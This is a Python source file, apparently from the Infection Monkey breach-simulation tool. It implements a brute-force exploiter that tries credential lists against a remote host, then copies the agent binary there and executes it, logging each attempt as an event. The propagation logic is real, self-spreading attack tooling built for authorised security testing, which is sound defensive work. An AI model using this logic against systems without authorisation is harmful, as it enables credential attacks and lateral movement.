import logging
from contextlib import suppress
from pathlib import PurePath
from time import time
from typing import Callable, Iterable, Set

from common import OperatingSystem
from common.agent_events import AgentEventTag, ExploitationEvent, PropagationEvent
from common.credentials import Credentials
from common.event_queue import IAgentEventPublisher
from common.types import AgentID, Event
from infection_monkey.exploit import IAgentBinaryRepository
from infection_monkey.i_puppet import ExploiterResult, TargetHost
from infection_monkey.utils.threading import interruptible_iter

from . import (
    IRemoteAccessClient,
    IRemoteAccessClientFactory,
    RemoteAuthenticationError,
    RemoteCommandExecutionError,
    RemoteFileCopyError,
)

# Module-level logger, named after this module
logger = logging.getLogger(__name__)


class BruteForceExploiter:
    """
    An exploiter that brute-forces credentials and propagates the Monkey agent

    Operates on any exploit client that implements `IRemoteAccessClient`. An
    instance of `IRemoteAccessClientFactory` must be provided to create the
    exploit client.

    An `ExploitationEvent` is published for every login attempt that either
    succeeds or fails with `RemoteAuthenticationError`. A `PropagationEvent` is
    published when propagation succeeds or fails with `RemoteFileCopyError` /
    `RemoteCommandExecutionError`.
    """

    def __init__(
        self,
        exploiter_name: str,
        agent_id: AgentID,
        destination_path: PurePath,
        exploit_client_factory: IRemoteAccessClientFactory,
        get_credentials: Callable[[], Iterable[Credentials]],
        agent_binary_repository: IAgentBinaryRepository,
        agent_event_publisher: IAgentEventPublisher,
        tags: Set[AgentEventTag],
    ):
        """
        :param exploiter_name: The name of the exploiter
        :param agent_id: The ID of the agent that is running this exploiter
        :param destination_path: The destination path into which copy the agent
        :param exploit_client_factory: A factory that creates the exploit client
        :param get_credentials: A function that provides credentials for brute-forcing
        :param agent_binary_repository: A repository that provides the agent binary
        :param agent_event_publisher: A publisher that publishes agent events
        :param tags: Tags to add to the agent events
        """
        self._exploiter_name = exploiter_name
        self._agent_id = agent_id
        self._destination_path = destination_path
        self._exploit_client_factory = exploit_client_factory
        self._get_credentials = get_credentials
        self._agent_binary_repository = agent_binary_repository
        self._agent_event_publisher = agent_event_publisher
        self._tags = tags

    def exploit_host(
        self,
        host: TargetHost,
        interrupt: Event,
    ) -> ExploiterResult:
        """
        Exploits the given host and propagates the Monkey agent

        Exploitation (brute-forcing a login) is attempted first; propagation
        (copying and executing the agent) is attempted only if it succeeds.
        Exceptions raised while exploiting or propagating are logged and
        reflected in the returned result rather than re-raised.

        :param host: The host to exploit
        :param interrupt: An event that can be set to interrupt the exploit
        :return: The result of the exploit. If `interrupt` is already set on
                 entry, a default `ExploiterResult()` is returned without any
                 work being done.
        """
        if interrupt.is_set():
            return ExploiterResult()

        exploit_client = self._exploit_client_factory.create()

        try:
            self._exploit(exploit_client, host, interrupt)
        except Exception as err:
            logger.exception(f"Failed to exploit {host.ip}: {err}")
            return ExploiterResult(exploitation_success=False, propagation_success=False)

        try:
            self._propagate(exploit_client, host, interrupt)
        except Exception as err:
            logger.exception(f"Failed to propagate to {host.ip}: {err}")
            return ExploiterResult(exploitation_success=True, propagation_success=False)

        return ExploiterResult(exploitation_success=True, propagation_success=True)

    def _exploit(self, exploit_client: IRemoteAccessClient, host: TargetHost, interrupt: Event):
        """
        Try each available credential until one logs in successfully

        An `ExploitationEvent` is published for each attempt that succeeds or
        fails with `RemoteAuthenticationError`. Any other exception raised by
        `exploit_client.login` propagates to the caller without an event.

        :param exploit_client: The client used to attempt logins
        :param host: The host being exploited
        :param interrupt: Passed to `interruptible_iter` so the credential loop
                          can be cut short
        :raises Exception: If no credential led to a successful login
        """
        credential_combinations = self._get_credentials()

        for brute_force_credentials in interruptible_iter(credential_combinations, interrupt):
            # A fresh set per attempt is handed to the client; it is merged with
            # the exploiter-wide tags for this attempt's event.
            tags: Set[AgentEventTag] = set()
            timestamp = time()
            try:
                exploit_client.login(brute_force_credentials, tags)
            except RemoteAuthenticationError as err:
                self._publish_exploitation_event(
                    host,
                    success=False,
                    time=timestamp,
                    tags=self._tags.union(tags),
                    error_message=str(err),
                )
                continue

            self._publish_exploitation_event(
                host, success=True, time=timestamp, tags=self._tags.union(tags)
            )
            return

        raise Exception("Failed to login with the given credentials")

    def _propagate(
        self,
        exploit_client: IRemoteAccessClient,
        host: TargetHost,
        interrupt: Event,
    ):
        """
        Copy the agent binary to the host and execute it

        Publishes a `PropagationEvent` on success, or on failure with
        `RemoteFileCopyError` / `RemoteCommandExecutionError`.

        :param exploit_client: An already logged-in client for the host
        :param host: The host to propagate to
        :param interrupt: Forwarded to `_copy_agent_binary`
        :raises RemoteFileCopyError: If the agent binary could not be copied
        :raises RemoteCommandExecutionError: If a remote command failed
        """
        copy_file_tags: Set[AgentEventTag] = set()
        execute_agent_tags: Set[AgentEventTag] = set()
        # Timestamp the propagation attempt before any remote interaction
        timestamp = time()

        try:
            # Querying the OS is part of propagation: if it fails with a remote
            # error, a failed PropagationEvent must still be published, since the
            # caller reports propagation_success=False in that case.
            target_host_os = exploit_client.get_os()
            file_path = self._copy_agent_binary(
                target_host_os, self._destination_path, copy_file_tags, exploit_client, interrupt
            )
            exploit_client.execute_agent(file_path, execute_agent_tags)
        except (RemoteFileCopyError, RemoteCommandExecutionError) as err:
            self._publish_propagation_event(
                host,
                success=False,
                time=timestamp,
                tags=self._tags.union(copy_file_tags, execute_agent_tags),
                error_message=str(err),
            )
            raise

        self._publish_propagation_event(
            host,
            success=True,
            time=timestamp,
            tags=self._tags.union(copy_file_tags, execute_agent_tags),
        )

    def _copy_agent_binary(
        self,
        target_host_os: OperatingSystem,
        destination: PurePath,
        tags: Set[AgentEventTag],
        exploit_client: IRemoteAccessClient,
        interrupt: Event,
    ) -> PurePath:
        """
        Copy the agent binary for `target_host_os` onto the remote host

        `destination` is tried first. If that copy raises `RemoteFileCopyError`,
        a file with the same name is tried in each directory returned by
        `exploit_client.get_writable_paths()`, iterated via `interruptible_iter`.

        :param target_host_os: The OS whose agent binary should be copied
        :param destination: The preferred remote path for the binary
        :param tags: Passed to every `copy_file` call
        :param exploit_client: The client used to copy the file
        :param interrupt: Used to cut short the search over fallback paths
        :return: The remote path the agent binary was copied to
        :raises RemoteFileCopyError: If no destination could be written
        """
        agent_binary = self._agent_binary_repository.get_agent_binary(target_host_os)
        agent_binary_bytes = agent_binary.getvalue()

        with suppress(RemoteFileCopyError):
            logger.debug(f"Attempting to copy agent binary to {destination}")
            exploit_client.copy_file(agent_binary_bytes, destination, tags)
            return destination

        other_destinations = exploit_client.get_writable_paths()
        logger.debug(f"Using file name: {destination.name}")
        for other_destination in interruptible_iter(other_destinations, interrupt):
            destination_path = other_destination / destination.name
            with suppress(RemoteFileCopyError):
                logger.debug(f"Attempting to copy agent binary to {destination_path}")
                exploit_client.copy_file(agent_binary_bytes, destination_path, tags)
                return destination_path

        raise RemoteFileCopyError("Failed to copy file")

    def _publish_exploitation_event(
        self,
        target_host: TargetHost,
        time: float,
        success: bool = False,
        tags: Iterable[AgentEventTag] = (),
        error_message: str = "",
    ):
        """
        Publish an `ExploitationEvent` for `target_host`

        :param target_host: The host that was targeted
        :param time: The timestamp of the attempt
        :param success: Whether the attempt succeeded
        :param tags: Tags to attach to the event (copied into a frozenset). The
                     default is an immutable empty tuple to avoid a shared
                     mutable default argument.
        :param error_message: Error description for failed attempts
        """
        exploitation_event = ExploitationEvent(
            source=self._agent_id,
            target=target_host.ip,
            success=success,
            exploiter_name=self._exploiter_name,
            error_message=error_message,
            timestamp=time,
            tags=frozenset(tags),
        )
        self._agent_event_publisher.publish(exploitation_event)

    def _publish_propagation_event(
        self,
        target_host: TargetHost,
        time: float,
        success: bool = False,
        tags: Iterable[AgentEventTag] = (),
        error_message: str = "",
    ):
        """
        Publish a `PropagationEvent` for `target_host`

        :param target_host: The host that was targeted
        :param time: The timestamp of the attempt
        :param success: Whether propagation succeeded
        :param tags: Tags to attach to the event (copied into a frozenset). The
                     default is an immutable empty tuple to avoid a shared
                     mutable default argument.
        :param error_message: Error description for failed attempts
        """
        propagation_event = PropagationEvent(
            source=self._agent_id,
            target=target_host.ip,
            success=success,
            exploiter_name=self._exploiter_name,
            error_message=error_message,
            timestamp=time,
            tags=frozenset(tags),
        )
        self._agent_event_publisher.publish(propagation_event)
